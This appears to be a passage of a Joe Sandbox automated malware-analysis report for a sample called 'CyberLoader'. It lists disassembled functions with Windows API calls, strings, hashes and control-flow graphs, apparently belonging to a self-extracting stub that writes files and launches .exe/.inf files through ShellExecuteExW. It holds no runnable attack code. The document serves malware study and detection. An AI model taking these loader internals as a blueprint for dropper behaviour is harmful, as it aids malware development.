                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                  • API String ID: 3564274579-312220925
                                                  • Opcode ID: e0fb93c1b96611a029987d600276d72d0753f769d71af45b95cb671e41046148
                                                  • Instruction ID: 96ad0a5a5ae9e5bab6c07be42b42d73110fe89eaa92826f154b4cdcffac107e2
                                                  • Opcode Fuzzy Hash: e0fb93c1b96611a029987d600276d72d0753f769d71af45b95cb671e41046148
                                                  • Instruction Fuzzy Hash: E7E18176D11119AADF25EFA0DC49EEF737CAF19311F5040A6FA09E3091EB709A948F60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0027D346
                                                  • _wcschr.LIBVCRUNTIME ref: 0027D367
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0027D328,?), ref: 0027D382
                                                  • __fprintf_l.LIBCMT ref: 0027D873
                                                    • Part of subcall function 0028137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0027B652,00000000,?,?,?,00010464), ref: 00281396
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                  • String ID: $ ,$$%s:$$9*$*messages***$*messages***$@%s:$R$RTL$a
                                                  • API String ID: 4184910265-3558133059
                                                  • Opcode ID: a9ea32df4e0813fa9ac4d82274454b6cbc0cdb51cffb742164db6f9b80b08bbd
                                                  • Instruction ID: 0d067facf661aace5b223ccb643b9adf6e3b0debd6d3a8867c749d9f5921dc60
                                                  • Opcode Fuzzy Hash: a9ea32df4e0813fa9ac4d82274454b6cbc0cdb51cffb742164db6f9b80b08bbd
                                                  • Instruction Fuzzy Hash: 6F12B37192021A9BDF24EFA4DC81BEEB7B5FF05710F50856AF509A7181EB709A60CF24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0028AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028AC85
                                                    • Part of subcall function 0028AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028AC96
                                                    • Part of subcall function 0028AC74: IsDialogMessageW.USER32(00010464,?), ref: 0028ACAA
                                                    • Part of subcall function 0028AC74: TranslateMessage.USER32(?), ref: 0028ACB8
                                                    • Part of subcall function 0028AC74: DispatchMessageW.USER32(?), ref: 0028ACC2
                                                  • GetDlgItem.USER32(00000068,002CECB0), ref: 0028CB6E
                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0028A632,00000001,?,?,0028AECB,002A4F88,002CECB0), ref: 0028CB96
                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0028CBA1
                                                  • SendMessageW.USER32(00000000,000000C2,00000000,002A35B4), ref: 0028CBAF
                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0028CBC5
                                                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0028CBDF
                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0028CC23
                                                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0028CC31
                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0028CC40
                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0028CC67
                                                  • SendMessageW.USER32(00000000,000000C2,00000000,002A431C), ref: 0028CC76
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                  • String ID: \
                                                  • API String ID: 3569833718-2967466578
                                                  • Opcode ID: 39833a752188a763c9aa68132ade038ee53958d0ed63bab5e1f413215bef07d0
                                                  • Instruction ID: dd7723b50428d9eff61b4931b96cc13c7d7988e0fd585d1eac8ed9238cebd7d5
                                                  • Opcode Fuzzy Hash: 39833a752188a763c9aa68132ade038ee53958d0ed63bab5e1f413215bef07d0
                                                  • Instruction Fuzzy Hash: 1631C171546742EBE301EF20AC4EFAB7FACEBA2705F00050AF651961D1DB644D08CB76
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • ShellExecuteExW.SHELL32(?), ref: 0028CF54
                                                  • ShowWindow.USER32(?,00000000), ref: 0028CF93
                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0028CFCF
                                                  • CloseHandle.KERNEL32(?), ref: 0028CFF5
                                                  • ShowWindow.USER32(?,00000001), ref: 0028D084
                                                    • Part of subcall function 002817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0027BB05,00000000,.exe,?,?,00000800,?,?,002885DF,?), ref: 002817C2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                  • String ID: $.exe$.inf
                                                  • API String ID: 3686203788-2452507128
                                                  • Opcode ID: a48723b21a4991050a4923ce673aa0b1cc751e6388ffa2a8ce52d2b6b13762bf
                                                  • Instruction ID: 8dd148d098ecf28c425c18b4924fc7ee4f8d8633b25d66ea44ecce1bfa87bbc2
                                                  • Opcode Fuzzy Hash: a48723b21a4991050a4923ce673aa0b1cc751e6388ffa2a8ce52d2b6b13762bf
                                                  • Instruction Fuzzy Hash: C061197842A3829BDB31BF24D8046ABB7F5EF95300F14481EF5C4971D1D7B189A9CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00294E35,00294E35,?,?,?,0029A2A9,00000001,00000001,3FE85006), ref: 0029A0B2
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0029A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0029A138
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0029A232
                                                  • __freea.LIBCMT ref: 0029A23F
                                                    • Part of subcall function 00298518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0029C13D,00000000,?,002967E2,?,00000008,?,002989AD,?,?,?), ref: 0029854A
                                                  • __freea.LIBCMT ref: 0029A248
                                                  • __freea.LIBCMT ref: 0029A26D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1414292761-0
                                                  • Opcode ID: 588aa5f33c057323cfe3a7e07c7de31f270f6dd4f92aaec6e706977161e436a1
                                                  • Instruction ID: d1df2fd39f70fc2c1b8e65abb24e48babe64ddf3d29e2a6f44e69bbd5bbc3b9c
                                                  • Opcode Fuzzy Hash: 588aa5f33c057323cfe3a7e07c7de31f270f6dd4f92aaec6e706977161e436a1
                                                  • Instruction Fuzzy Hash: 9951BF72A20316AFDF258F64CC42EBB77AAEB41750F154229FC08D6180DB75DC608AE2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00280085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002800A0
                                                    • Part of subcall function 00280085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027EB86,Crypt32.dll,00000000,0027EC0A,?,?,0027EBEC,?,?,?), ref: 002800C2
                                                  • OleInitialize.OLE32(00000000), ref: 0028A34E
                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0028A385
                                                  • SHGetMalloc.SHELL32(002B8430), ref: 0028A38F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                  • String ID: riched20.dll$3To
                                                  • API String ID: 3498096277-2168385784
                                                  • Opcode ID: c7865b262fe9adf983a87bcc4fa407adb168e5d9f6175cbd37ab4a0416fa9ebe
                                                  • Instruction ID: 984c0da90b1445597eb68fd2cfb0d5cae76f0202ac019e0cf42353775d77eb58
                                                  • Opcode Fuzzy Hash: c7865b262fe9adf983a87bcc4fa407adb168e5d9f6175cbd37ab4a0416fa9ebe
                                                  • Instruction Fuzzy Hash: 30F03CB1C01209ABCB10AF9998499EFFBFCEBA5701F00415AE854A2241CBB446098FA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 940 2799b0-2799d1 call 28e360 943 2799d3-2799d6 940->943 944 2799dc 940->944 943->944 945 2799d8-2799da 943->945 946 2799de-2799fb 944->946 945->946 947 279a03-279a0d 946->947 948 2799fd 946->948 949 279a12-279a31 call 2770bf 947->949 950 279a0f 947->950 948->947 953 279a33 949->953 954 279a39-279a57 CreateFileW 949->954 950->949 953->954 955 279abb-279ac0 954->955 956 279a59-279a7b GetLastError call 27b66c 954->956 957 279ac2-279ac5 955->957 958 279ae1-279af5 955->958 965 279a7d-279a9f CreateFileW GetLastError 956->965 966 279aaa-279aaf 956->966 957->958 960 279ac7-279adb SetFileTime 957->960 961 279af7-279b0f call 27fe56 958->961 962 279b13-279b1e 958->962 960->958 961->962 968 279aa5-279aa8 965->968 969 279aa1 965->969 966->955 970 279ab1 966->970 968->955 968->966 969->968 970->955
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,002778AD,?,00000005,?,00000011), ref: 00279A4C
                                                  • GetLastError.KERNEL32(?,?,002778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00279A59
                                                  • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,002778AD,?,00000005,?), ref: 00279A8E
                                                  • GetLastError.KERNEL32(?,?,002778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00279A96
                                                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,002778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00279ADB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: File$CreateErrorLast$Time
                                                  • String ID:
                                                  • API String ID: 1999340476-0
                                                  • Opcode ID: 05cba0f7b412ea674ed4d066e747b3e097fa73b6610cc3cfe0d13b0798ebccd0
                                                  • Instruction ID: 84d42956524ec73143e0a11163e8bdc4b6c4a1fdba4f951c2fa10a9c9e6f7c6c
                                                  • Opcode Fuzzy Hash: 05cba0f7b412ea674ed4d066e747b3e097fa73b6610cc3cfe0d13b0798ebccd0
                                                  • Instruction Fuzzy Hash: B34166305557466FE320CF24DC0ABDABBD4BB01324F104719F6E8921D1E7B4A9E8CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 999 28a2c7-28a2e6 GetClassNameW 1000 28a2e8-28a2fd call 2817ac 999->1000 1001 28a30e-28a310 999->1001 1006 28a30d 1000->1006 1007 28a2ff-28a30b FindWindowExW 1000->1007 1003 28a31b-28a31f 1001->1003 1004 28a312-28a315 SHAutoComplete 1001->1004 1004->1003 1006->1001 1007->1006
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000050), ref: 0028A2DE
                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 0028A315
                                                    • Part of subcall function 002817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0027BB05,00000000,.exe,?,?,00000800,?,?,002885DF,?), ref: 002817C2
                                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0028A305
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                  • String ID: EDIT
                                                  • API String ID: 4243998846-3080729518
                                                  • Opcode ID: b945a8a77452bedb28e84a3776f69f667a87552f2bf74a4e1dff7cc306fe3dc7
                                                  • Instruction ID: 35b04ef581791e7e1256f5498f5f4304a65ad8a3e430389abd833a39e2ef7571
                                                  • Opcode Fuzzy Hash: b945a8a77452bedb28e84a3776f69f667a87552f2bf74a4e1dff7cc306fe3dc7
                                                  • Instruction Fuzzy Hash: EFF08236E22228BBE7206A64AC09F9B776C9B56B11F080097BD05A21C0DB609D65C6F6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1008 28d287-28d2b2 call 28e360 SetEnvironmentVariableW call 27fbd8 1012 28d2b7-28d2bb 1008->1012 1013 28d2bd-28d2c1 1012->1013 1014 28d2df-28d2e3 1012->1014 1015 28d2ca-28d2d1 call 27fcf1 1013->1015 1018 28d2c3-28d2c9 1015->1018 1019 28d2d3-28d2d9 SetEnvironmentVariableW 1015->1019 1018->1015 1019->1014
                                                  APIs
                                                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0028D29D
                                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0028D2D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentVariable
                                                  • String ID: sfxcmd$sfxpar
                                                  • API String ID: 1431749950-3493335439
                                                  • Opcode ID: 5363a57507833b6d59c4a0ec02d1983a6a5f29eccd22884d58a918e9272ba250
                                                  • Instruction ID: f22e564968876da5f275b3a6f212dc37aca1fb05d6cc41e3444d06b28f28a235
                                                  • Opcode Fuzzy Hash: 5363a57507833b6d59c4a0ec02d1983a6a5f29eccd22884d58a918e9272ba250
                                                  • Instruction Fuzzy Hash: DFF0A776821238A7DB207F919C09ABA7798AF0B751B014456FC4896182DA70CD60DBF1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1020 27984e-27985a 1021 279867-27987e ReadFile 1020->1021 1022 27985c-279864 GetStdHandle 1020->1022 1023 279880-279889 call 279989 1021->1023 1024 2798da 1021->1024 1022->1021 1028 2798a2-2798a6 1023->1028 1029 27988b-279893 1023->1029 1026 2798dd-2798e2 1024->1026 1031 2798b7-2798bb 1028->1031 1032 2798a8-2798b1 GetLastError 1028->1032 1029->1028 1030 279895 1029->1030 1036 279896-2798a0 call 27984e 1030->1036 1034 2798d5-2798d8 1031->1034 1035 2798bd-2798c5 1031->1035 1032->1031 1033 2798b3-2798b5 1032->1033 1033->1026 1034->1026 1035->1034 1037 2798c7-2798d0 GetLastError 1035->1037 1036->1026 1037->1034 1039 2798d2-2798d3 1037->1039 1039->1036
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 0027985E
                                                  • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00279876
                                                  • GetLastError.KERNEL32 ref: 002798A8
                                                  • GetLastError.KERNEL32 ref: 002798C7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$FileHandleRead
                                                  • String ID:
                                                  • API String ID: 2244327787-0
                                                  • Opcode ID: 8e24f5728dedddfbe2a3da043b9b536da0459345851b0c1245e1a9ecc5d8edba
                                                  • Instruction ID: 99845c7217d748c88603297516abf6cd902406c85a2ad437cd6b6eb8b79e0e53
                                                  • Opcode Fuzzy Hash: 8e24f5728dedddfbe2a3da043b9b536da0459345851b0c1245e1a9ecc5d8edba
                                                  • Instruction Fuzzy Hash: E611A030920305EBDB209F5AD808A6977A8EF0B730F10C12AF42E85690DB759EA09F53
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1041 29a4f4-29a508 1042 29a50a-29a513 1041->1042 1043 29a515-29a530 LoadLibraryExW 1041->1043 1044 29a56c-29a56e 1042->1044 1045 29a559-29a55f 1043->1045 1046 29a532-29a53b GetLastError 1043->1046 1049 29a568 1045->1049 1050 29a561-29a562 FreeLibrary 1045->1050 1047 29a54a 1046->1047 1048 29a53d-29a548 LoadLibraryExW 1046->1048 1051 29a54c-29a54e 1047->1051 1048->1051 1052 29a56a-29a56b 1049->1052 1050->1049 1051->1045 1053 29a550-29a557 1051->1053 1052->1044 1053->1052
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00293713,00000000,00000000,?,0029A49B,00293713,00000000,00000000,00000000,?,0029A698,00000006,FlsSetValue), ref: 0029A526
                                                  • GetLastError.KERNEL32(?,0029A49B,00293713,00000000,00000000,00000000,?,0029A698,00000006,FlsSetValue,002A7348,002A7350,00000000,00000364,?,00299077), ref: 0029A532
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0029A49B,00293713,00000000,00000000,00000000,?,0029A698,00000006,FlsSetValue,002A7348,002A7350,00000000), ref: 0029A540
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 23a0270d99b81f5d43cbc7accd51c0816f103cb66023c538bd87dba2852956fc
                                                  • Instruction ID: 4c57cb26061b058b6fc9e948d53199eae602eb3a60fae18a6abd6ebc41c69792
                                                  • Opcode Fuzzy Hash: 23a0270d99b81f5d43cbc7accd51c0816f103cb66023c538bd87dba2852956fc
                                                  • Instruction Fuzzy Hash: 3401FC32F31323ABCF218E6CAC48A667798AF467A17660520F90AD3140DB31D910CAD1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00298FA5: GetLastError.KERNEL32(?,002B0EE8,00293E14,002B0EE8,?,?,00293713,00000050,?,002B0EE8,00000200), ref: 00298FA9
                                                    • Part of subcall function 00298FA5: _free.LIBCMT ref: 00298FDC
                                                    • Part of subcall function 00298FA5: SetLastError.KERNEL32(00000000,?,002B0EE8,00000200), ref: 0029901D
                                                    • Part of subcall function 00298FA5: _abort.LIBCMT ref: 00299023
                                                    • Part of subcall function 0029B2AE: _abort.LIBCMT ref: 0029B2E0
                                                    • Part of subcall function 0029B2AE: _free.LIBCMT ref: 0029B314
                                                    • Part of subcall function 0029AF1B: GetOEMCP.KERNEL32(00000000,?,?,0029B1A5,?), ref: 0029AF46
                                                  • _free.LIBCMT ref: 0029B200
                                                  • _free.LIBCMT ref: 0029B236
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorLast_abort
                                                  • String ID: *
                                                  • API String ID: 2991157371-3442289017
                                                  • Opcode ID: 138b8b5e9530f0575c6ac755f68279772c900b05b1a062b904154a070606f008
                                                  • Instruction ID: 70b1b3f1393244127c433c54416eff8deb138a70434044026f90105c9d86bdbd
                                                  • Opcode Fuzzy Hash: 138b8b5e9530f0575c6ac755f68279772c900b05b1a062b904154a070606f008
                                                  • Instruction Fuzzy Hash: F2313831910209AFDF11EFA8E945B6DB7F4EF02320F2500A9E8089B291EF719D51CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
